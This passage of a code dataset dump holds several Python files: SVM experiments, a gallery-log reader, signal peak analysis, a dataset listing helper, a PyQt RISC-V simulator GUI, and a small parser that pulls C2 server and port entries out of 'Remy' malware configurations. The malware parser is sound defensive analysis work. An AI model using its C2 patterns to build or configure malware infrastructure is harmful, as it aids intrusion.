"line_number": 370, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 380, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Ridge", "line_number": 395, "usage_type": "call"}, {"api_name": "sklearn.kernel_ridge.KernelRidge", "line_number": 405, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 424, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 434, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 440, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 445, "usage_type": "call"}]} +{"seq_id": "125093907", "text": "import random\nimport sys\nfrom collections import defaultdict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport svmutil\nfrom mwv_svm import mwv_svm\nfrom wta_svm import wta_svm\n\ntrain_path = \"../data/pendigits/pendigits\"\ntest_path = \"../data/pendigits/pendigits.t\"\n\n\"\"\"\nExamples of options: -s 0 -c 10 -t 1 -g 1 -r 1 -d 3\nClassify a binary data with polynomial kernel (u'v+1)^3 and C = 10\n\n\noptions:\n-s svm_type : set type of SVM (default 0)\n 0 -- C-SVC\n 1 -- nu-SVC\n 2 -- one-class SVM\n 3 -- epsilon-SVR\n 4 -- nu-SVR\n-t kernel_type : set type of kernel function (default 2)\n 0 -- linear: u'*v\n 1 -- polynomial: (gamma*u'*v + coef0)^degree\n 2 -- radial basis function: exp(-gamma*|u-v|^2)\n 3 -- sigmoid: tanh(gamma*u'*v + coef0)\n-d degree : set degree in kernel function (default 3)\n-g gamma : set gamma in kernel function (default 1/num_features)\n-r coef0 : set coef0 in kernel function (default 0)\n-c cost : set the parameter C of C-SVC, epsilon-SVR, and nu-SVR (default 1)\n-n nu : set the parameter nu of nu-SVC, one-class SVM, and nu-SVR (default 0.5)\n-p epsilon : set the epsilon in loss function of epsilon-SVR (default 0.1)\n-m cachesize : set cache memory size in MB (default 100)\n-e epsilon : set tolerance of termination criterion (default 0.001)\n-h shrinking: whether to use the shrinking heuristics, 0 or 1 (default 1)\n-b probability_estimates: whether to train a SVC or SVR model for probability estimates, 0 or 1 (default 0)\n-wi weight: set the parameter C of class i to weight*C, for C-SVC (default 1)\n\nThe k in the -g option means the number of attributes in the input data.\n\"\"\"\n\n\"\"\"\nRBF Gaussian / Polinomial\n\"\"\"\n\n\ndef read_dataset(path, shuffle=False):\n ys, xs = svmutil.svm_read_problem(path)\n\n if not shuffle:\n return ys, xs\n\n data = list(zip(ys, xs))\n random.shuffle(data)\n\n ys_shuf, xs_shuf = [], []\n\n for v in data:\n ys_shuf.append(v[0])\n xs_shuf.append(v[1])\n\n return ys_shuf, xs_shuf\n\n\ndef get_data():\n ys_train, xs_train = read_dataset(train_path, shuffle=True)\n ys_test, xs_test = read_dataset(test_path, shuffle=True)\n\n return (ys_train, xs_train), (ys_test, xs_test)\n\n\ndef preview(train, test):\n (ys_train, xs_train), (ys_test, xs_test) = train, test\n\n x_counts = defaultdict(lambda: 0)\n y_counts = defaultdict(lambda: 0)\n\n xs = xs_train + xs_test\n ys = ys_train + ys_test\n for i in range(len(xs)):\n for k in xs[i].keys():\n x_counts[k] += 1\n y_counts[ys[i]] += 1\n\n fig, ax = plt.subplots(figsize=(10, 10))\n ax.bar(y_counts.keys(), y_counts.values(), 0.5, color=\"g\")\n plt.xticks(np.arange(10))\n # plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\", rotation_mode=\"anchor\")\n plt.show()\n pass\n\n\ndef main():\n (ys_train, xs_train), (ys_test, xs_test) = get_data()\n\n # preview((ys_train, xs_train), (ys_test, xs_test))\n # exit(0)\n\n k2i = {\"rbf\": 2, \"poly\": 1}\n\n methods = {\"wta\": wta_svm, \"mwv\": mwv_svm}\n\n methods[sys.argv[1]](\n ys_test,\n xs_test,\n ys_train,\n xs_train,\n ktype=k2i[sys.argv[2]],\n gamma=float(sys.argv[3]),\n )\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "scratch/multiclass.py", "file_name": "multiclass.py", "file_ext": "py", "file_size_in_byte": 3202, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "svmutil.svm_read_problem", "line_number": 53, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 59, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 80, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "wta_svm.wta_svm", "line_number": 106, "usage_type": "name"}, {"api_name": "mwv_svm.mwv_svm", "line_number": 106, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 108, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 114, "usage_type": "attribute"}]} +{"seq_id": "331554300", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on May 11, 2015\n\n@author: IbnouT / ibnou.toure001@gmail.com\n@Team: TheBadBoyz\n'''\nimport sys\nfrom src.LogFile import MyLogFile\nfrom src import LogFile\nfrom sortedcontainers import SortedDict, SortedList\nfrom src.ArgsParser import MyParser\nfrom src import ArgsParser\n'''\nfrom src.ArgsParser import MyParser\nfrom src import ArgsParser\n'''\n\ndef executeTask(params):\n '''\n Process a set of valid parameters to append a new log\n '''\n \n #Get reference to log file object \n myLogs = MyLogFile(params.log, params.token)\n \n #Open log file\n ret = myLogs.open(True)\n if ret < 0 : return ret\n\n\n #--------------------------------------------------------------\n # Case -S : Print the current state of the log to stdout.\n #-------------------------------------------------------------- \n if params.state :\n #--> Get all people in Gallery\n #item, self.logs[item][INDEX_LAST_LOG_ENTRY][IDX_ROOMID], self.logs[item][INDEX_DIR]\n myIter = myLogs.getPeopleInGalleryRooms() \n #--> Init and populates lists\n rooms = SortedDict()\n employes = SortedList()\n guests = SortedList()\n \n for item in myIter : \n #register this room if the person did not leave it\n if item[2] != LogFile.DIR_L :\n if item[1] not in rooms : rooms[item[1]] = SortedList()\n rooms[item[1]].add(item[0][1:])\n \n #in all case the person is in the gallery\n if item[0][:1] == LogFile.PREFIX_E: employes.add(item[0][1:])\n else: guests.add(item[0][1:])\n \n #-->Employes in the Gallery\n print(\",\".join(employes))\n \n #-->Guests in the Gallery\n print (\",\".join(guests))\n \n #-->People per room\n for room in (room for room in rooms if (room != LogFile.GALLERY_ID)) : #more pythonic way :D\n #if room != LogFile.GALLERY_ID : \n print (\"{0}: {1}\".format(room, \",\".join(rooms[room])))\n \n return 0\n \n \n #--------------------------------------------------------------\n # Case -R : Give a list of all rooms entered by an employee or guest.\n #-------------------------------------------------------------- \n if params.roomlist :\n #--> Get all rooms \n if params.employee != None : \n rooms = map(str, list(myLogs.getRoomsVisitedByPerson(LogFile.PREFIX_E+params.employee, LogFile.TYPE_E)))\n else :\n rooms = map(str, list(myLogs.getRoomsVisitedByPerson(LogFile.PREFIX_G+params.guest, LogFile.TYPE_G))) \n \n lenrooms = len(rooms)\n if lenrooms > 0 : \n listRooms = []\n for i in xrange(lenrooms-1, -1, -2) : \n listRooms.append(rooms[i])\n print (\",\".join(listRooms))\n \n return 0\n \n \n #--------------------------------------------------------------\n # Case -T : Gives the total time spent in the gallery by an employee or guest.\n #-------------------------------------------------------------- \n if params.totaltime :\n #--> Get all rooms\n if params.employee != None : \n totalTime = myLogs.getTotalTimePerson(LogFile.PREFIX_E+params.employee, LogFile.TYPE_E)\n else :\n totalTime = myLogs.getTotalTimePerson(LogFile.PREFIX_G+params.guest, LogFile.TYPE_G)\n \n if totalTime >= 0 : print (totalTime)\n \n return 0\n \n \n #--------------------------------------------------------------\n # Case -I : Prints the rooms, as a comma-separated list of room IDs, \n # that were occupied by all the specified employees and guests at the \n # same time over the complete history of the gallery.\n #-------------------------------------------------------------- \n\n if params.allroomlist :\n rooms = myLogs.getSharedRoomsVisited(params.employee, params.guest)\n if len(rooms) > 0 : print (\",\".join(rooms))\n \n return 0 \n \n return -1\n\n\n\ndef main():\n '''\n Main function\n '''\n '''\n ' Initialization\n '''\n #Prepare the commandline args parser\n #parserApp = MyParser(ArgsParser.LOG_READ, \"Parser for 'logread' inputs args\")\n parserApp = MyParser(ArgsParser.LOG_READ)\n \n #If combination of args are not valid\n if not parserApp.isArgsValid() :\n print (\"invalid\")\n return -1\n \n ret = executeTask(parserApp.params)\n \n if ret == -1 : print (\"invalid\")\n elif ret == -2 : print (\"integrity violation\")\n \n return ret\n\n\n\n\nif __name__ == '__main__':\n \n #sys.exit(main()) \n\n try: \n #call the main function\n ret = main()\n \n except:\n print (\"invalid\")\n ret = -1 \n \n\n sys.exit(ret) \n\n ", "sub_path": "143/code/build/logread.py", "file_name": "logread.py", "file_ext": "py", "file_size_in_byte": 4832, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "src.LogFile.MyLogFile", "line_number": 26, "usage_type": "call"}, {"api_name": "sortedcontainers.SortedDict", "line_number": 41, "usage_type": "call"}, {"api_name": "sortedcontainers.SortedList", "line_number": 42, "usage_type": "call"}, {"api_name": "sortedcontainers.SortedList", "line_number": 43, "usage_type": "call"}, {"api_name": "src.LogFile.DIR_L", "line_number": 47, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 47, "usage_type": "name"}, {"api_name": "sortedcontainers.SortedList", "line_number": 48, "usage_type": "call"}, {"api_name": "src.LogFile.PREFIX_E", "line_number": 52, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 52, "usage_type": "name"}, {"api_name": "src.LogFile.GALLERY_ID", "line_number": 62, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 62, "usage_type": "name"}, {"api_name": "src.LogFile.PREFIX_E", "line_number": 75, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 75, "usage_type": "name"}, {"api_name": "src.LogFile.TYPE_E", "line_number": 75, "usage_type": "attribute"}, {"api_name": "src.LogFile.PREFIX_G", "line_number": 77, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 77, "usage_type": "name"}, {"api_name": "src.LogFile.TYPE_G", "line_number": 77, "usage_type": "attribute"}, {"api_name": "src.LogFile.PREFIX_E", "line_number": 95, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 95, "usage_type": "name"}, {"api_name": "src.LogFile.TYPE_E", "line_number": 95, "usage_type": "attribute"}, {"api_name": "src.LogFile.PREFIX_G", "line_number": 97, "usage_type": "attribute"}, {"api_name": "src.LogFile", "line_number": 97, "usage_type": "name"}, {"api_name": "src.LogFile.TYPE_G", "line_number": 97, "usage_type": "attribute"}, {"api_name": "src.ArgsParser.MyParser", "line_number": 129, "usage_type": "call"}, {"api_name": "src.ArgsParser.LOG_READ", "line_number": 129, "usage_type": "attribute"}, {"api_name": "src.ArgsParser", "line_number": 129, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 159, "usage_type": "call"}]} +{"seq_id": "44262021", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib\nimport sys\nimport random\nfrom tqdm import tqdm\n\ni_c, q_c = 1.934521753372309, 0.617395316850268\niq_ratio = 0.9261851848012432\n\n\nplt.style.use(\"ggplot\")\nplt.rcParams['axes.facecolor'] = '#f7f9fc'\n\nplt.rcParams.update({'font.size': 28})\nmatplotlib.rc('xtick', labelsize=24)\nmatplotlib.rc('ytick', labelsize=24)\n\n\ndef get_phase(data):\n q = (data.q - q_c) * iq_ratio + q_c\n return np.unwrap(2*np.arctan((q-q_c)/(data.i-i_c)))/2\n\ndef get_amp(data):\n q = (data.q - q_c) * iq_ratio + q_c\n return np.sqrt((q-q_c)**2 + (data.i-i_c)**2)/radius\n\nwindow = 70\nthreshold = 14 # poi va messa a 7\n\npp = []\n\nfor i in tqdm(range(20000)): #in teoria tutto\n try:\n df = pd.read_csv(f\"signal{i}.dat\", sep=' ')\n df.columns = [\"i\", \"q\", \"t\"]\n except:\n continue\n if np.sum(df.i > 4096): continue\n df = df.sort_values([\"t\"])\n df = df.reset_index()\n df = df.iloc[10:3310]\n df.i *= 3.3/4095\n df.q *= 3.3/4095\n df[\"phase\"] = get_phase(df)*1000\n df.phase = df.phase.iloc[:500].mean() - df.phase\n\n if df.phase.rolling(window).mean().diff(window).max() > threshold:\n pp.append(df.phase.rolling(70).mean().max()*1.296) #1.296 è il gain factor\n\npp = np.asarray(pp)\nnp.savetxt(\"phase_peaks_new.dat\", pp)\n", "sub_path": "peaks_reconstruction/save_peaks.py", "file_name": "save_peaks.py", "file_ext": "py", "file_size_in_byte": 1324, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 14, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams.update", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.rc", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.rc", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.unwrap", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.arctan", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 27, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "526718934", "text": "\"\"\"\nUsage:\n main.py \n main.py -h | --help\nOptions:\n Specify the full path to the dataset directory\n Directory to output the .txt files with all the filenames and gt data.\nExample:\n python2 datasetToTxt.py /home/mcv/datasets/M5/classification/KITTI/ KITTI_txt\n\n\"\"\"\n\n# Imports\nimport os\nimport sys\nimport shutil\nimport glob\nimport numpy as np\nfrom docopt import docopt\n\n\n# Create a file with all the images as paths\ndef from_images_to_txt(directory, outDirectory):\n directory = os.path.join(directory)\n out_file = outDirectory + \"_images.txt\"\n out_file_label = outDirectory + \"_labels.txt\"\n\n folders = []\n\n for subdir in sorted(os.listdir(directory)):\n if os.path.isdir(os.path.join(directory, subdir)):\n folders.append(subdir)\n print(folders)\n\n filenames = []\n y = []\n\n # Get filenames\n\n for subdir in folders:\n\n if subdir == 'images':\n subpath = os.path.join(directory, subdir)\n for fname in os.listdir(subpath):\n filenames.append(os.path.join(subpath, fname))\n\n if subdir == 'masks':\n subpath1 = os.path.join(directory, subdir)\n for fname1 in os.listdir(subpath1):\n y.append(os.path.join(subpath1, fname1))\n\n print(\" Saving file: \" + out_file)\n outfile = open(out_file, \"w\")\n out_file_label = open(out_file_label, \"w\")\n\n for item in filenames:\n outfile.write(\"%s\\n\" % item)\n\n for label in y:\n out_file_label.write(\"%s\\n\" % label)\n\n\ndef main():\n if len(sys.argv) > 1:\n args = docopt(__doc__)\n\n directory = args['']\n outDirectory = args['']\n\n from_images_to_txt(directory+'/train', outDirectory+'/train')\n from_images_to_txt(directory+'/valid', outDirectory+'/valid')\n from_images_to_txt(directory+'/test', outDirectory+'/test')\n\n else:\n print ('Not enough arguments')\n exit()\n\n# Entry point of the script\nif __name__ == \"__main__\":\n main()\n", "sub_path": "CodeW3/dataset_2_text.py", "file_name": "dataset_2_text.py", "file_ext": "py", "file_size_in_byte": 2076, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 64, "usage_type": "attribute"}, {"api_name": "docopt.docopt", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "259986912", "text": "from common.abstracts import MalParserBase\nfrom structs.remy import Remy\nfrom lib.struct_formatter import dive_struct\n\n\nclass MalParser(MalParserBase):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.cfg_structs = Remy\n\t\tself.magic = b'\\w{1,10}\\.\\w{1,20}\\.\\w{1,6}:\\d{4}\\x0a'\n\t\tself.cfg_start_offset = 0\n\t\tself.cfg_size = 0x100\n\t\tself.json_key = ['c2_blocks']\n\n\tdef make_json(self):\n\t\tself.pretty_cfg = {}\n\t\tprint(self.raw_cfg.__dict__)\n\t\tfor key in self.raw_cfg.__dict__:\n\t\t\tif key not in self.json_key:\n\t\t\t\tcontinue\n\t\t\tvalue = self.raw_cfg.__dict__[key]\n\t\t\tif key == 'c2_blocks':\n\t\t\t self.pretty_cfg['c2_blocks'] = []\n\t\t\t for c2_block in value:\n\t\t\t\t c2_server = c2_block.__dict__['c2_server']\n\t\t\t\t port = c2_block.__dict__['port']\n\t\t\t\t self.pretty_cfg[key].append({'c2_server': c2_server, 'port':port})\n", "sub_path": "parsers/remy.py", "file_name": "remy.py", "file_ext": "py", "file_size_in_byte": 820, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "common.abstracts.MalParserBase", "line_number": 6, "usage_type": "name"}, {"api_name": "structs.remy.Remy", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "529312562", "text": "from PyQt5 import QtCore, QtGui, QtWidgets\nimport importlib\nimport MachineCodeParser\nimport RunSim_forward\nimport RunSim_stall\nimport RunSim_non_pipelined\nimport sys\n#MachineCodeParser.parser(\"temp_gui_instructions.mc\")\n\npipeline = 0 #0 for non-pipelined, 1 for pipeline w/o forwarding, 2 for pipeline with forwarding\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"RISC-V-Simulator\")\n MainWindow.resize(1390, 844)\n font = QtGui.QFont()\n font.setPointSize(11)\n MainWindow.setFont(font)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n #\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(640, 10, 201, 31))\n font = QtGui.QFont()\n font.setPointSize(12)\n self.label.setFont(font)\n self.label.setObjectName(\"label\")\n\n self.label_param1 = QtWidgets.QLabel(self.centralwidget)\n self.label_param1.setGeometry(QtCore.QRect(525, 100, 200, 25))\n self.label_param1.setObjectName(\"label_param1\")\n self.line_edit1 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit1.setGeometry(QtCore.QRect(725, 100, 100, 25))\n self.line_edit1.setObjectName(\"line_edit1\")\n #self.line_edit1.returnPressed.connect(lambda: self.do_action_cache_size())\n\n self.label_param2 = QtWidgets.QLabel(self.centralwidget)\n self.label_param2.setGeometry(QtCore.QRect(525, 150, 200, 25))\n self.label_param2.setObjectName(\"label_param2\")\n self.line_edit2 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit2.setGeometry(QtCore.QRect(725, 150, 100, 25))\n self.line_edit2.setObjectName(\"line_edit2\")\n #self.line_edit2.returnPressed.connect(lambda: self.do_action_block_size())\n\n self.label_param3 = QtWidgets.QLabel(self.centralwidget)\n self.label_param3.setGeometry(QtCore.QRect(525, 200, 200, 25))\n self.label_param3.setObjectName(\"label_param3\")\n self.line_edit3 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit3.setGeometry(QtCore.QRect(725, 200, 100, 25))\n self.line_edit3.setObjectName(\"line_edit3\")\n #self.line_edit3.returnPressed.connect(lambda: self.do_action_associativity())\n self.label_param4 = QtWidgets.QLabel(self.centralwidget)\n self.label_param4.setGeometry(QtCore.QRect(525, 275, 200, 25))\n self.label_param4.setObjectName(\"label_param4\")\n self.line_edit4 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit4.setGeometry(QtCore.QRect(725, 275, 100, 25))\n self.line_edit4.setObjectName(\"line_edit4\")\n\n self.label_param5 = QtWidgets.QLabel(self.centralwidget)\n self.label_param5.setGeometry(QtCore.QRect(525, 325, 200, 25))\n self.label_param5.setObjectName(\"label_param5\")\n self.line_edit5 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit5.setGeometry(QtCore.QRect(725, 325, 100, 25))\n self.line_edit5.setObjectName(\"line_edit5\")\n\n self.label_param6 = QtWidgets.QLabel(self.centralwidget)\n self.label_param6.setGeometry(QtCore.QRect(525, 375, 200, 25))\n self.label_param6.setObjectName(\"label_param6\")\n self.line_edit6 = QtWidgets.QLineEdit(self.centralwidget)\n self.line_edit6.setGeometry(QtCore.QRect(725, 375, 100, 25))\n self.line_edit6.setObjectName(\"line_edit6\")\n\n self.radiobutton_pipeline_no_fwd = QtWidgets.QRadioButton(self.centralwidget)\n self.radiobutton_pipeline_no_fwd.setGeometry(QtCore.QRect(550, 450, 225, 50))\n self.radiobutton_pipeline_no_fwd.toggled.connect(self.pipeline_no_fwd_selected)\n\n self.radiobutton_pipeline_fwd = QtWidgets.QRadioButton(self.centralwidget)\n self.radiobutton_pipeline_fwd.setGeometry(QtCore.QRect(550, 500, 225, 50))\n self.radiobutton_pipeline_fwd.toggled.connect(self.pipeline_fwd_selected)\n\n self.radiobutton_non_pipeline = QtWidgets.QRadioButton(self.centralwidget)\n self.radiobutton_non_pipeline.setGeometry(QtCore.QRect(550, 550, 225, 50))\n self.radiobutton_non_pipeline.toggled.connect(self.non_pipeline_selected)\n\n\n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(20, 50, 451, 711))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.label_2 = QtWidgets.QLabel(self.frame)\n self.label_2.setGeometry(QtCore.QRect(200, 10, 121, 21))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_2.setFont(font)\n self.label_2.setObjectName(\"label_2\")\n #self.MachineCode = QtWidgets.QTextBrowser(self.frame)\n #self.MachineCode.setGeometry(QtCore.QRect(0, 40, 511, 681))\n #self.MachineCode.setReadOnly(False)\n #self.MachineCode.setAcceptRichText(False)\n #self.MachineCode.setLineWrapMode(False)\n #self.MachineCode.setObjectName(\"MachineCode\")\n #\n self.tableWidget = QtWidgets.QTableWidget(self.frame)\n self.tableWidget.setGeometry(QtCore.QRect(20, 40, 411, 671))\n self.tableWidget.setRowCount(0)\n self.tableWidget.setColumnCount(0)\n self.tableWidget.setObjectName(\"tableWidget\")\n #\n\n self.frame_3 = QtWidgets.QFrame(self.centralwidget)\n self.frame_3.setGeometry(QtCore.QRect(930, 50, 451, 711))\n self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame_3.setObjectName(\"frame_3\")\n self.label_4 = QtWidgets.QLabel(self.frame_3)\n self.label_4.setGeometry(QtCore.QRect(200, 10, 71, 31))\n font = QtGui.QFont()\n font.setPointSize(10)\n self.label_4.setFont(font)\n self.label_4.setObjectName(\"label_4\")\n self.tableWidget2 = QtWidgets.QTableWidget(self.frame_3)\n self.tableWidget2.setGeometry(QtCore.QRect(20, 40, 411, 671))\n self.tableWidget2.setRowCount(0)\n self.tableWidget2.setColumnCount(0)\n self.tableWidget2.setObjectName(\"tableWidget2\")\n #\n self.Run = QtWidgets.QPushButton(self.centralwidget)\n self.Run.setGeometry(QtCore.QRect(640, 740, 141, 41))\n self.Run.setObjectName(\"Run\")\n self.Step = QtWidgets.QPushButton(self.centralwidget)\n self.Step.setGeometry(QtCore.QRect(640, 680, 141, 41))\n self.Step.setObjectName(\"Step\")\n self.Assemble = QtWidgets.QPushButton(self.centralwidget)\n self.Assemble.setGeometry(QtCore.QRect(640, 620, 141, 41))\n self.Assemble.setObjectName(\"Assemble\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 1390, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n # running button\n self.Run.clicked.connect(self.run)\n self.Assemble.clicked.connect(self.assemble)\n self.Step.clicked.connect(self.step)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"RISC-V-Simulator\", \"RISC-V-Simulator\"))\n self.label.setText(_translate(\"RISC-V-Simulator\", \"RISC-V SIMULATOR\"))\n self.label_2.setText(_translate(\"RISC-V-Simulator\", \"I$\"))\n #self.label_3.setText(_translate(\"RISC-V-Simulator\", \"Registers\"))\n self.label_4.setText(_translate(\"RISC-V-Simulator\", \"D$\"))\n\n self.label_param1.setText(_translate(\"RISC-V-Simulator\", \"I$ Cache Size (Bytes)\"))\n self.label_param2.setText(_translate(\"RISC-V-Simulator\", \"I$ Block Size (Bytes)\"))\n self.label_param3.setText(_translate(\"RISC-V-Simulator\", \"I$ Associativity\"))\n self.label_param4.setText(_translate(\"RISC-V-Simulator\", \"D$ Cache Size (Bytes)\"))\n self.label_param5.setText(_translate(\"RISC-V-Simulator\", \"D$ Block Size (Bytes)\"))\n self.label_param6.setText(_translate(\"RISC-V-Simulator\", \"D$ Associativity\"))\n\n self.radiobutton_pipeline_fwd.setText(_translate(\"RISC-V-Simulator\", \"Pipelined with Forwarding\"))\n self.radiobutton_pipeline_no_fwd.setText(_translate(\"RISC-V-Simulator\", \"Pipelined without Forwarding\"))\n self.radiobutton_non_pipeline.setText(_translate(\"RISC-V-Simulator\", \"Non-Pipelined\"))\n\n self.Run.setText(_translate(\"RISC-V-Simulator\", \"RUN\"))\n self.Step.setText(_translate(\"RISC-V-Simulator\", \"STEP\"))\n self.Assemble.setText(_translate(\"RISC-V-Simulator\", \"ASSEMBLE\"))\n\n def update_inst_cache(self, dic):\n #cache_list = list of sets(list of blocks)\n #maintain a non empty set boolean!!!??!!\n self.tableWidget.setRowCount(0)\n self.tableWidget.setColumnCount(2)\n self.tableWidget.setColumnWidth(0, 100)\n self.tableWidget.setColumnWidth(1, 1000)\n #self.tableWidget.setColumnWidth(2, 150)\n\n self.tableWidget.setHorizontalHeaderItem(0, QtWidgets.QTableWidgetItem(\"Tag\"))\n self.tableWidget.setHorizontalHeaderItem(1, QtWidgets.QTableWidgetItem(\"Contents\"))\n #self.tableWidget.setHorizontalHeaderItem(2, QtWidgets.QTableWidgetItem(\"Contents\"))\n\n i=0\n for key, value in dic.items():\n self.tableWidget.insertRow(self.tableWidget.rowCount())\n self.tableWidget.setItem(self.tableWidget.rowCount()-1, 0,\n QtWidgets.QTableWidgetItem(str(key)))\n s = [str(i) for i in value]\n self.tableWidget.setItem(self.tableWidget.rowCount()-1, 1,\n QtWidgets.QTableWidgetItem(\" | \".join(s)))\n print(key, \"|\".join(s))\n #print(key, value)\n\n\n def update_data_cache(self, dic):\n #cache_list = list of sets(list of blocks)\n #maintain a non empty set boolean!!!??!!\n self.tableWidget2.setRowCount(0)\n self.tableWidget2.setColumnCount(2)\n self.tableWidget2.setColumnWidth(0, 100)\n self.tableWidget2.setColumnWidth(1, 1000)\n #self.tableWidget2.setColumnWidth(2, 150)\n\n self.tableWidget2.setHorizontalHeaderItem(0, QtWidgets.QTableWidgetItem(\"Tag\"))\n self.tableWidget2.setHorizontalHeaderItem(1, QtWidgets.QTableWidgetItem(\"Contents\"))\n #self.tableWidget2.setHorizontalHeaderItem(2, 